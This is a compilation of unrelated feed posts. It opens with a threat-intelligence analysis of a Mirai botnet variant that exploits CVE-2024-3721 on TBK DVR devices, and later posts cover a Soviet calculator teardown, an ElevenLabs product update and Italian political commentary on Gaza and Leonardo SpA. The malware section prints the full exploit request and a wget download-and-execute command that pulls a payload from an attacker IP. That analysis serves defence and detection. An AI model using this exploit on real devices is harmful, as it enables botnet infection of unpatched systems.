The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.

We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.

Exploitation

During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a CVE-2024-3721. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:
"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"
The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.
cd /tmp; rm arm7; wget 42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.

Malware implant – Mirai variant

The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.

The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.

Data decryption

The data decryption routine in this variant is implemented as a simple RC4 algorithm.

The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: 6e7976666525a97639777d2d7f303177.

The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted structure, which is a simple string list:

Data decryption routine

The global linked list with decrypted data is accessed whenever the malware needs particular strings.

Adding decrypted strings to the global list

Anti-VM and anti-emulation

To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc directory, which is the proc filesystem on Linux.

Each process ID (PID) has its own folder containing useful information, such as cmdline, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with VMware or QEMU-arm in their command line.

Process check

The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:

Allowed directories

Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.

Infection statistics

According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.

Conclusion

Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.

The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.

All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Indicators of compromise

Host-based (MD5 hashes)
011a406e89e603e93640b10325ebbdc8
24fd043f9175680d0c061b28a2801dfc
29b83f0aae7ed38d27ea37d26f3c9117
2e9920b21df472b4dd1e8db4863720bf
3120a5920f8ff70ec6c5a45d7bf2acc8
3c2f6175894bee698c61c6ce76ff9674
45a41ce9f4d8bb2592e8450a1de95dcc
524a57c8c595d9d4cd364612fe2f057c
74dee23eaa98e2e8a7fc355f06a11d97
761909a234ee4f1d856267abe30a3935
7eb3d72fa7d730d3dbca4df34fe26274
8a3e1176cb160fb42357fa3f46f0cbde
8d92e79b7940f0ac5b01bbb77737ca6c
95eaa3fa47a609ceefa24e8c7787bd99
96ee8cc2edc8227a640cef77d4a24e83
aaf34c27edfc3531cf1cf2f2e9a9c45b
ba32f4eef7de6bae9507a63bde1a43aa
IPs
116.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36

securelist.com/mirai-botnet-va…

Tearing down hardware from different parts of the world can be revealing, showing unique parts, techniques, and tricks employed by engineers living in a very different world from our own. To that end, [msylvain59] has been kind enough to give us a look inside the Elektronika MK-26—a calculator built in the former Soviet Union.

There’s lots of interesting stuff to see from the get-go. The oddball button pad is covered in Cyrillic symbols, quite alien to those of us more accustomed to the Latin character set. It’s also constructed somewhat unlike more familiar models from Western-aligned companies like Casio or Commodore. It also rattles when shaken, which doesn’t inspire confidence. Inside, it’s got old-school brown PCBs without the usual green solder mask, a chunky IC in a weird package, and display is via a power-hungry VFD.

It doesn’t look so totally alien inside; much of the construction is pretty typical of the mid-1970s, wherever you went around the world. The most striking differences are more in the graphics and visual design than anything else.

Ultimately, there are reasons why manufacturers around the world tend to converge on similar techniques. Generally, it’s because it’s more economical or easier to do things a certain way. And yet, we still see regional variances because conditions, technologies, and parts availability varies around the world. This teardown highlights that quite clearly.

If you’re just getting a taste for Soviet hardware teardowns, you’ll love this video diving inside a real Soyuz clock.

youtube.com/embed/N2kkGV5aBs8?…

hackaday.com/2025/06/06/soviet…

ElevenLabs, nota per le sue soluzioni all’avanguardia di sintesi vocale ed effetti sonori basati sull’intelligenza artificiale, ha annunciato un importante aggiornamento della sua piattaforma: Conversational AI 2.0. Sviluppata da ex ingegneri di Palantir, la nuova versione rappresenta un ulteriore passo avanti nella creazione di agenti vocali più naturali e intelligenti per le aziende, dall’assistenza clienti all’automazione di vendite e marketing.

La seconda versione dell’IA conversazionale è ora in grado di gestire le sfumature che distinguono il dialogo dal vivo dai servizi vocali robotici.

Grazie al nuovo sistema, l’agente impara a rispondere alle pause, alle caratteristiche di intonazione e a non interrompere l’interlocutore, nonché a utilizzare correttamente pause e riempitivi, eliminando completamente la sensazione di comunicazione meccanica. Questa funzione è particolarmente richiesta nei servizi di supporto e nei call center, dove la velocità di risposta è fondamentale senza compromettere il comfort del cliente.

Un’importante innovazione è l’identificazione automatica della lingua: ora l’agente stesso determina la lingua dell’utente e la cambia istantaneamente, senza bisogno di configurare manualmente le impostazioni. Questa funzione sta già diventando uno standard per le aziende globali che lavorano con un pubblico multilingue e contribuisce ad abbattere le barriere linguistiche per i clienti.

Il nuovo sistema include anche la tecnologia RAG (Retrieval-Augmented Generation), che consente di recuperare informazioni al volo da basi di conoscenza esterne. Ad esempio, un assistente vocale medico potrà accedere istantaneamente alle linee guida aggiornate e un servizio di supporto potrà accedere alla documentazione interna dei prodotti. Tutto ciò viene implementato con ritardi minimi e maggiori garanzie di privacy, un aspetto fondamentale per settori regolamentati come quello medico.

Uno degli aspetti chiave della piattaforma è il supporto multimodale. Ora l’agente può interagire non solo tramite voce, ma anche tramite testo, e combinare entrambi i canali senza la necessità di creare versioni diverse per ciascuna piattaforma. Inoltre, è stata introdotta la modalità “Multi-Character“: l’assistente vocale può cambiare ruolo e stile di comunicazione, imitando immagini diverse, aprendo nuove opportunità per la creatività, i programmi educativi e gli scenari di formazione.

Per le aziende che operano nel settore delle comunicazioni di massa, è stata implementata una funzione di chiamata in uscita in batch: ora la piattaforma consente di avviare automaticamente chiamate parallele, utile per condurre sondaggi, inviare notifiche o messaggi personalizzati. Questo aumenta significativamente la portata del pubblico e riduce il carico di lavoro degli operatori.

Gli sviluppatori di ElevenLabs hanno prestato particolare attenzione ai requisiti di sicurezza e alla conformità agli standard: la nuova piattaforma soddisfa i requisiti HIPAA per i dati medici e supporta l’archiviazione opzionale delle informazioni nell’UE, un aspetto importante per i clienti aziendali soggetti a rigide restrizioni normative. Il sistema è progettato per garantire un’elevata disponibilità, si integra facilmente con servizi esterni ed è adatto all’utilizzo in infrastrutture critiche.

La piattaforma è disponibile a diverse tariffe, da un piano gratuito con un set base di minuti e un limite di connessioni simultanee, a un piano business con un pacchetto di servizi esteso e supporto per migliaia di minuti al mese. Questo approccio rende il prodotto accessibile sia alle startup che alle grandi aziende.

Il rilascio di Conversational AI 2.0 segna una nuova pietra miliare nello sviluppo delle tecnologie vocali per le aziende: ElevenLabs punta sulla massima naturalezza, adattabilità e scalabilità delle sue soluzioni, sottolineando che l’era degli interlocutori digitali realistici è appena iniziata.

L'articolo Lavori in un Call Center? Inizia ad avere paura per il tuo lavoro! proviene da il blog della sicurezza informatica.

Satellite images show a new militia operating in southern Gaza in an area under IDF control, and a former Israeli defense minister claimed Israel is arming an ISIS-affiliated militia in Gaza to counter Hamas. In response, PM Netanyahu's office said the country is "working to defeat Hamas in various ways."

Se fosse vero sarebbe l'ennesima prova di quanto Israele sia sceso in basso.

Da qualche giorno, nel silenzio omertoso dei media tradizionali, sono comparsi a Roma questi manifesti e continuano ad apparire nelle vie principali della Città.

I manifesti, in italiano e in inglese, mostrano la fotografia di una bambina palestinese gravemente ferita con la dicitura "Guarda cosa mi ha fatto LEONARDO!!".

Naturalmente Leonardo è l'azienda Leonardo Spa, il primo produttore di armi nell'Unione Europea, il secondo in Europa, il 13° nel mondo (SIPRI).

Il manifesto invita ad inquadrare il codice QR in basso per scoprire cos'è e cosa fa effettivamente Leonardo.

Ogni cittadino, ogni passante, ogni turista, può autonomamente inquadrare il codice QR col proprio cellulare e acquisire un filmato ampiamente documentato sulla responsabilità dell'azienda italiana nel Genocidio che sta perpetrando Israele.

Ma perché proprio Leonardo?

Nell'ultimo bilancio aziendale, la stessa Leonardo definisce in sintesi il proprio profilo: "Leonardo è il maggiore polo industriale e tecnologico del settore Aerospazio, Difesa e Sicurezza, forte di una presenza industriale in Italia, Regno Unito, Stati Uniti d'America, Polonia e Israele".

Israele non è semplicemente un cliente, ma ospita stabilimenti e dipendenti di Leonardo.

La presenza diretta di Leonardo in Israele si deve a un'operazione conclusasi nel luglio 2022 con l'acquisizione della società israeliana RADA Electronic Industries, specializzata in radar per la difesa a corto raggio e anti-droni (vedi il comunicato della Campagna BDS Italia), e alla conseguente nascita della nuova società israeliana DRS RADA Technologies, che è, si noti, controllata da Leonardo DRS Inc. con sede negli Stati Uniti. Ha 248 dipendenti in tre sedi israeliane (uffici a Netanya, stabilimento principale a Beit She'an, centro ricerche presso il Gav-Yam Negev Tech Park di Beer Sheva), oltre ai nuovissimi uffici a Germantown, Maryland, ai margini dell'area metropolitana di Washington, D.C.

🔎 weaponwatch.net/2024/01/26/cos…

Tra le tante iniziative per sensibilizzare la popolazione e informarla, l'idea di utilizzare il "vecchio" strumento della cartellonistica, dei tazebao, per manifestare e comunicare, associato alla possibilità tecnologica di acquisire informazioni e approfondire, è veramente geniale.

I manifesti possono essere rimossi, naturalmente, ma basta una foto per essere riprodotti, restare in memoria e essere riproposti all'infinito in ogni città italiana, in ogni punto cruciale di raduno, senza che vi siano motivi di censura.

E non solo.

È una risposta discreta ma gridata, a chi sta cercando di cambiare narrazione dopo più di 600 giorni di orrore trasmesso in diretta.

L'operazione gattopardesca di autoassoluzione, infatti, non individua i veri responsabili, non li cita, non li condanna.

Si limita ad un fastidioso piagnisteo buonista che cerca in Netanyahu il capro espiatorio.

Non pretende l'unica cosa che il governo italiano e i neo convertiti Stati europei devono fare: riconoscere la complicità e interrompere qualsiasi rapporto diplomatico e commerciale con Israele.

La multinazionale Leonardo ha confermato direttamente ad "Altreconomia" l'assistenza e l'export di pezzi di ricambio per i velivoli M-346 sui quali si addestrano i piloti dell'aviazione di Tel Aviv. L'esecutivo italiano, (alias Crosetto e Tajani), aveva assicurato pubblicamente lo "stop", ma è stato smentito dalla stessa Leonardo SPA e dai suoi bilanci.

facebook.com/share/p/1Y4GduDSe…